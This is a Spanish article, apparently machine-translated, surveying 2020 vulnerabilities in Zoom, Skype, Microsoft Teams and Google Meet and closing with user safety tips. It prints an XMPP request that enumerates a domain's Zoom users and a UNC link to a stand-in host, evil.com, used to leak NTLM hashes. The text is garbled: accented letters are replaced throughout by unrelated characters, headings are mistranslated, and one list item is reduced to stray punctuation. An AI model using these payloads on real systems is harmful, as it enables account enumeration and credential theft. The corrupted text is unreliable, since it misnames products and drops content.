Seguridad en servicios de video comunicaci贸n

imagen



Los requisitos b谩sicos para los servicios para organizar videoconferencias son calidad, confiabilidad y seguridad. Y si los dos primeros requisitos son b谩sicamente comparables para todos los jugadores principales, entonces la situaci贸n de seguridad es significativamente diferente. En esta publicaci贸n, veremos c贸mo funcionan los servicios m谩s utilizados: Zoom, Skype, Microsoft Teams y Google Meet.



Desde el comienzo de la pandemia, todos los servicios de videoconferencia han experimentado un crecimiento explosivo en el n煤mero de usuarios:







imagen

El aumento en el valor de las acciones de Zoom Video desde el comienzo de la pandemia. Fuente: Investing.com



Sin embargo, la demanda masiva no solo provoc贸 un aumento en los precios de las acciones de las empresas , sino que tambi茅n demostr贸 claramente los problemas con la seguridad de los servicios, que por alguna raz贸n nadie hab铆a pensado antes. Algunos de los problemas est谩n relacionados con la calidad del trabajo de los programadores y pueden conducir a la ejecuci贸n remota de c贸digo. Otros se basan en decisiones arquitect贸nicas inapropiadas que brindan una oportunidad para el uso malicioso del servicio.



Enfocar



Zoom Video literalmente irrumpi贸 en el mercado de videoconferencia y r谩pidamente se convirti贸 en un l铆der. Desafortunadamente, el liderazgo se manifest贸 no solo en la cantidad de usuarios, sino tambi茅n en la cantidad de errores detectados. La situaci贸n era tan deprimente que los departamentos militares y gubernamentales de muchos pa铆ses prohibieron a los empleados usar el producto problem谩tico; Las grandes empresas hicieron lo mismo. Considere las vulnerabilidades de Zoom que llevaron a estas decisiones.



Problemas de cifrado



Zoom declara que todas las videollamadas est谩n protegidas por encriptaci贸n, pero en realidad no todo es tan hermoso: el servicio usa encriptaci贸n, pero el programa cliente solicita la clave de sesi贸n de uno de los servidores del "sistema de gesti贸n de claves" que forman parte de la infraestructura en la nube de Zoom. Estos servidores generan una clave de cifrado y la emiten a los suscriptores que se unen a la conferencia, una clave para todos los participantes de la conferencia.



La transferencia de la clave del servidor al cliente se realiza a trav茅s del protocolo TLS, que tambi茅n se utiliza para https. Si alguno de los participantes de la conferencia usa Zoom en su tel茅fono, tambi茅n se enviar谩 una copia de la clave de cifrado a otro servidor de conector de telefon铆a Zoom.



Algunos de los servidores del sistema de gesti贸n de claves se encuentran en China, y se utilizan para emitir claves incluso cuando todos los participantes de la conferencia se encuentran en otros pa铆ses. Existen temores justos de que el gobierno de la RPC pueda interceptar el tr谩fico cifrado y luego descifrarlo utilizando las claves obtenidas de los proveedores de forma voluntaria y obligatoria.



Otro problema de cifrado est谩 relacionado con su implementaci贸n pr谩ctica:



  • aunque la documentaci贸n establece que se utilizan claves AES de 256 bits, su longitud real es de solo 128 bits;
  • El algoritmo AES funciona en modo ECB, cuando el resultado del cifrado conserva parcialmente la estructura de los datos originales.


imagen

Resultado del cifrado de im谩genes usando el modo ECB y otros modos AES. Fuente: Wikipedia



$ 500K Vulnerabilidad



A mediados de abril de 2020, se descubrieron dos vulnerabilidades de d铆a cero en clientes Zoom para Windows y macOS. La vulnerabilidad RCE del cliente de Windows se puso inmediatamente a la venta por 500 mil d贸lares estadounidenses . Para aprovechar el error, el atacante debe llamar a la v铆ctima o participar en la misma conferencia con ella.



Una vulnerabilidad en el cliente macOS no proporcion贸 tales capacidades, por lo que es poco probable su uso en ataques reales.



Respuestas a solicitudes XMPP no autorizadas



A fines de abril de 2020, Zoom descubri贸 otra vulnerabilidad: usar una solicitud XMPP especialmente dise帽adacualquiera podr铆a obtener una lista de todos los usuarios del servicio que pertenecen a cualquier dominio . Por ejemplo, puede obtener una lista de direcciones de usuario del dominio usa.gov enviando una solicitud XMPP del formulario:



<iq id='{XXXX}' type='get' 
from='any_username@xmpp.zoom.us/ZoomChat_pc' xmlns='jabber:client'> 
	<query xmlns='zoom:iq:group' chunk='1' directory='1'> 
	<group id='usa.gov' version='0' option='0'/> 
	</query>
</iq>


La aplicaci贸n simplemente no verific贸 el dominio del usuario que solicitaba la lista de direcciones.



Tomando el control de macOS Se



descubrieron dos vulnerabilidades en el cliente Zoom para macOS que podr铆an permitir a un atacante tomar el control de un dispositivo.



  1. El instalador de Zoom utiliz贸 una t茅cnica de instalaci贸n oculta que el malware a menudo utiliza para instalarse sin la interacci贸n del usuario. Un atacante local sin privilegios podr铆a haber inyectado c贸digo malicioso en el instalador de Zoom y obtener privilegios de root.
  2. Zoom-, , . .


Vulnerabilidad de UNC en el cliente de Windows



Una vulnerabilidad descubierta en el cliente de Zoom para Windows podr铆a provocar la filtraci贸n de credenciales de usuario a trav茅s de enlaces de UNC . La raz贸n es que el cliente Zoom de Windows convierte enlaces a rutas UNC, por lo que si env铆a un enlace como \\ evil.com \ img \ kotik.jpg al chat, Windows intentar谩 conectarse a este sitio utilizando el protocolo SMB para abrir el archivo kotik.jpg. El sitio remoto recibir谩 un nombre de usuario y un hash NTLM de la computadora local, que se puede descifrar usando Hashcat u otras herramientas.



Usando esta t茅cnica, fue posible ejecutar casi cualquier programa en la computadora local . Por ejemplo, el enlace \ 127.0.0.1 \ C $ \ windows \ system32 \ calc.exe iniciar谩 la calculadora.



Grabaciones de grabaci贸n de video llamada



A principios de abril, aparecieron grabaciones de videollamadas personales de usuarios de Zoom en YouTube y Vimeo . Estos incluyeron lecciones escolares, sesiones de psicoterapia y consultas m茅dicas, as铆 como reuniones corporativas.

La raz贸n de la filtraci贸n fue que el servicio asign贸 identificadores abiertos a las videoconferencias, y los organizadores de la conferencia no protegieron con contrase帽a el acceso a ellos. Cualquiera podr铆a "fusionar" los registros y usarlos a su discreci贸n.



Zumbombing



Este es el caso cuando no prestar suficiente atenci贸n a la configuraci贸n predeterminada de seguridad de la conferencia conlleva graves consecuencias. Para conectarse a cualquier reuni贸n de video en Zoom, fue suficiente conocer la identificaci贸n de la reuni贸n, y los bromistas comenzaron a usar esto en masa. Entraron en clases en l铆nea y practicaron una especie de "ingenio" all铆, por ejemplo, lanzaron una demostraci贸n en pantalla con un video porno o pintaron un documento en la pantalla del maestro con im谩genes obscenas.



Luego result贸 que el problema es mucho m谩s amplio que simplemente interrumpir las lecciones en l铆nea. Los reporteros del New York Times descubrieron conversaciones e hilos cerrados en los foros de Reddit y 4Chan, cuyos miembros realizaron campa帽as masivas para interrumpir los eventos p煤blicos., Reuniones en l铆nea de Alcoh贸licos An贸nimos y otras reuniones de Zoom. Buscaron credenciales de inicio de sesi贸n disponibles p煤blicamente y luego invitaron a otros trolls a unirse a la "diversi贸n".



Correcci贸n de errores



Las denegaciones masivas del servicio obligaron a la administraci贸n de Zoom a tomar medidas urgentes. En una entrevista con CNN a principios de abril, el CEO de Zoom, Eric Yuan, dijo que la compa帽铆a se mov铆a demasiado r谩pido, por lo que cometieron algunos errores. Con la lecci贸n aprendida, dieron un paso atr谩s para enfocarse en la privacidad y la seguridad.



De acuerdo con el programa 90 Days to Security , Zoom ha dejado de trabajar en nuevas funciones desde el 1 de abril de 2020 y ha comenzado a solucionar problemas identificados y auditar la seguridad del c贸digo.

El resultado de estas medidas fue el lanzamiento de la versi贸n 5.0 de Zoom, que, entre otras cosas, actualiz贸 el cifrado AES a 256 bits e implement贸 muchas otras mejoras relacionadas con la seguridad de forma predeterminada.



Skype



A pesar del r谩pido crecimiento en el n煤mero de usuarios, Skype ha aparecido en las noticias de seguridad de la informaci贸n de este a帽o solo una vez, y aun as铆 no est谩 relacionado con una vulnerabilidad. En enero de 2020, un ex contratista le dijo a The Guardian que Microsoft hab铆a estado escuchando y procesando las voces de los usuarios de Skype y Cortana durante varios a帽os sin ninguna medida de seguridad. Sin embargo, por primera vez esto se supo en agosto de 2019, e incluso entonces los representantes de Microsoft explicaron que la recopilaci贸n de datos de voz se lleva a cabo para garantizar y mejorar el funcionamiento de los servicios de voz : b煤squeda y reconocimiento de comandos de voz, traducci贸n y transcripci贸n de voz.



imagen

Resultado de b煤squeda en la base de datos de vulnerabilidades para la consulta "Skype". Fuente:cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Skype



En cuanto a las vulnerabilidades, seg煤n la base de datos de CVE, no se encontraron vulnerabilidades en Skype en 2020.



Equipos de EM



Microsoft presta mucha atenci贸n a la seguridad de sus productos, incluidos los equipos de MS (aunque la opini贸n opuesta es generalizada). En 2019-2020, se descubrieron y solucionaron las siguientes vulnerabilidades en Teams:



1. CVE-2019-5922 : una vulnerabilidad en el instalador de Teams que permiti贸 a un atacante deslizar una DLL maliciosa sobre 茅l y obtener derechos en el sistema de destino, ya que el instalador no verific贸 en qu茅 DLL estaba en su carpeta



2. La vulnerabilidad de la plataforma Microsoft Teams permiti贸 comprometer una cuenta de usuario con una imagen.



imagen

Esquema de un ataque contra equipos de MS utilizando una imagen. Fuente: www.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams



El origen del problema fue c贸mo Teams maneja los tokens de acceso a im谩genes. La plataforma utiliza dos tokens para autenticar a un usuario: authtoken y skypetoken. Authtoken permite al usuario cargar im谩genes en los dominios de Teams y Skype y genera un skypetoken que se utiliza para autenticarse en el servidor que procesa comandos del cliente, como leer o enviar mensajes.



Un atacante que haya interceptado ambos tokens puede hacer llamadas a la API de Teams y obtener el control total sobre la cuenta:



  • leer y enviar mensajes
  • crear grupos,
  • agregar y eliminar usuarios,
  • cambiar permisos.


Para interceptarlo, fue suficiente para atraer a la v铆ctima al subdominio del dominio teams.microsoft.com controlado por el atacante usando un archivo GIF. Luego, el navegador de la v铆ctima enviar谩 un token autom谩tico al hacker, despu茅s de recibirlo, podr谩 crear un skypetoken.



3. Varias vulnerabilidades descubiertas por los investigadores de Tenable en el componente Tarjetas de alabanza y ventanas de chat permitieron inyectar c贸digo a cambios no autorizados en la configuraci贸n, as铆 como a robar credenciales de usuario. Microsoft no ha publicado una recomendaci贸n por separado para estos problemas, pero los ha solucionado en una nueva versi贸n de la aplicaci贸n.



Google se encuentra



A diferencia de servicios similares, Google Meet funciona completamente en el navegador. Gracias a esta funci贸n, en los 煤ltimos dos a帽os, las videoconferencias de Google nunca aparecieron en las noticias de seguridad de la informaci贸n. Incluso el aumento de 30 veces en el n煤mero de usuarios causado por la pandemia no revel贸 vulnerabilidades que afectan su seguridad.



Nuestras recomendaciones



El uso de cualquier software requiere una actitud responsable hacia la seguridad, y las herramientas de videoconferencia no son una excepci贸n. Aqu铆 hay algunas pautas para ayudar a proteger sus reuniones en l铆nea:



  1. usa la 煤ltima versi贸n del software,
  2. descargar instaladores de software solo de recursos oficiales,
  3. no publique ID de reuniones en Internet,
  4. proteger cuentas con autenticaci贸n de dos factores,
  5. permitir que solo los usuarios autorizados se conecten a las reuniones,
  6. cerrar la posibilidad de nuevas conexiones despu茅s del inicio del evento,
  7. permitir que el organizador bloquee o elimine a los asistentes a la reuni贸n,
  8. Utilice soluciones antivirus modernas que brinden protecci贸n integral contra amenazas nuevas y conocidas.


El cumplimiento de las normas de higiene en l铆nea para videoconferencias le permitir谩 trabajar de manera eficiente y segura incluso en los momentos m谩s dif铆ciles.



All Articles